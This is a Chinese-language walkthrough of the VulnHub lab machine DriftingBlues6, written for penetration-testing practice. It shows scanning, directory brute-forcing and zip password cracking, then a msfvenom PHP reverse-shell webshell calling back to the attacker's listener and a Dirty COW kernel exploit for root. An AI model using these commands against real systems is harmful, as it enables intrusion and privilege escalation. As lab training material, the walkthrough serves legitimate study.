看完这篇 教你玩转渗透测试靶机vulnhub——driftingblues6_vh

简介: 看完这篇 教你玩转渗透测试靶机vulnhub——driftingblues6_vh

Vulnhub靶机driftingblues6_vh渗透测试详解
Vulnhub靶机介绍:
Vulnhub靶机下载:
Vulnhub靶机漏洞详解:
①:信息收集:
②:开始目录爆破:
③:暴力破解zip:
③:上传WebShell:
④:脏牛提权:
⑤:获取flag:
Vulnhub靶机渗透总结:
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

Vulnhub靶机下载:
官网地址:https://www.vulnhub.com/entry/driftingblues-6,672/

Vulnhub靶机漏洞详解:
①:信息收集:
kali里使用netdiscover发现主机

渗透机:kali IP :172.16.5.42 靶机IP :172.16.5.12

使用命令:nmap -sS -sV -A -n 172.16.5.12

发现只有一个80端口 进行访问查看

使用dirb 172.16.5.12扫描网站的后台 发现了robots.txt 发现禁止爬取,然后根据提示访问 /textpattern/textpattern 发现了登入后台

他还给了一个提示 :别忘了加上,zip扩展到你的dir brute

②:开始目录爆破:
使用命令:python3 dirsearch.py -u http://172.16.5.12/ -e php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
1

先把这个zip下载下来 然后在解压 但是发现需要密码

③:暴力破解zip:
可以使用fcrackzip 破解, 字典也是kali自带的, 也可以使用john

使用命令:zip2join spammer.zip > password.txt
1
john password.txt #执行
1

得到密码是:myspace4

然后打开 zip 里面有个creds.txt 使用cat 查看一下 就是后台登入的账号和密码:mayer:lionheart

③:上传WebShell:
登入后台以后 需要找上传点 然后我们发现了一个Files 模块 可以进行上传。

这里可以使用的方法很多,我们就使用最简单的使用msfveom 制作一个php 回弹shell的木马 然后设置监听 运行木马即可。

msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.5.42 lport=886 -f raw > webshell.php
1
-p : 指定payload 为 php/meterpreter/reverse_tcp;
-f :设置输出格式(raw)

使用模块:use exploit/multi/handler

设置payload :set payload php/meterpreter/reverse_tcp
设置 监听端口和ip:

④:脏牛提权:
进入后渗透模块 先看一下基本信息,因为是一个www-data账户,需要升级到root权限。查看靶机内核信息:sysinfo 发现内核版本是 脏牛提权。

执行searchsploit 40839 然后upload 上传 40839.c 文件 gcc 编译 然后 ./运行

靶机执行:gcc -pthread 40839.c -o 40839 -lcrypt
为了保险给777权限:chmod 777 40839
最后执行:./40839
会要求你输入一个新的密码:

需要在shell 里面写一个python交互:

python -c 'import pty; pty.spawn("/bin/sh")'
1
然后切换用户 就是最高权限root了 查看flag

⑤:获取flag:

相关文章
|
2月前
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
31 4
|
2月前
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
37 4
|
2月前
|
Devops Shell 网络安全
Neos的渗透测试靶机练习——Wakanda
Neos的渗透测试靶机练习——Wakanda
26 2
|
3月前
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
40 0
|
3月前
|
安全 网络协议 Shell
渗透测试-靶机DC-1-知识点总结
渗透测试-靶机DC-1-知识点总结
43 0
|
7月前
|
安全 Shell Linux
记录VulnHub 靶场——Escalate_Linux渗透测试过程
本文档描述了一次靶场环境的搭建和渗透测试过程。首先,提供了靶机环境的下载链接,并建议在VMware或VirtualBox中以NAT模式或仅主机模式导入。接着,通过Kali Linux扫描发现靶机IP,并用Nmap扫描开放端口,识别出80、111、139、445、2049等端口。在80端口上找到一个shell.php文件,通过它发现可以利用GET参数传递cmd命令。
165 0
|
7月前
|
安全 网络安全 数据安全/隐私保护
VulnHub 靶场--super-Mario-Host超级马里奥主机渗透测试过程
这篇文章描述了在一个网络安全靶场环境中进行渗透测试的过程。首先,从百度网盘下载并导入虚拟机镜像,然后将其网络设置为NAT或仅主机模式。接下来,通过扫描靶机IP地址的本地网络段,发现靶机IP为192.168.220.135,并且了解到靶机上有一个名为“mario.supermariohost.local”的Web服务,运行在8180端口。尝试SSH弱口令攻击失败后,通过信息收集找到一个名为“luigi.php”的页面,其中包含一段英文提示,提示需要将域名添加到hosts文件中。 通过cewl工具从luigi.php生成字典文件passwords,然后使用hydra工具尝试SSH登录,成功获得l
133 0
|
19天前
|
JSON Java 测试技术
SpringCloud2023实战之接口服务测试工具SpringBootTest
SpringBootTest同时集成了JUnit Jupiter、AssertJ、Hamcrest测试辅助库,使得更容易编写但愿测试代码。
52 3
|
2月前
|
JSON 算法 数据可视化
测试专项笔记(一): 通过算法能力接口返回的检测结果完成相关指标的计算(目标检测)
这篇文章是关于如何通过算法接口返回的目标检测结果来计算性能指标的笔记。它涵盖了任务描述、指标分析(包括TP、FP、FN、TN、精准率和召回率),接口处理,数据集处理,以及如何使用实用工具进行文件操作和数据可视化。文章还提供了一些Python代码示例,用于处理图像文件、转换数据格式以及计算目标检测的性能指标。
68 0
测试专项笔记(一): 通过算法能力接口返回的检测结果完成相关指标的计算(目标检测)
|
3月前
|
移动开发 JSON Java
Jmeter实现WebSocket协议的接口测试方法
WebSocket协议是HTML5的一种新协议,实现了浏览器与服务器之间的全双工通信。通过简单的握手动作,双方可直接传输数据。其优势包括极小的头部开销和服务器推送功能。使用JMeter进行WebSocket接口和性能测试时,需安装特定插件并配置相关参数,如服务器地址、端口号等,还可通过CSV文件实现参数化,以满足不同测试需求。
252 7
Jmeter实现WebSocket协议的接口测试方法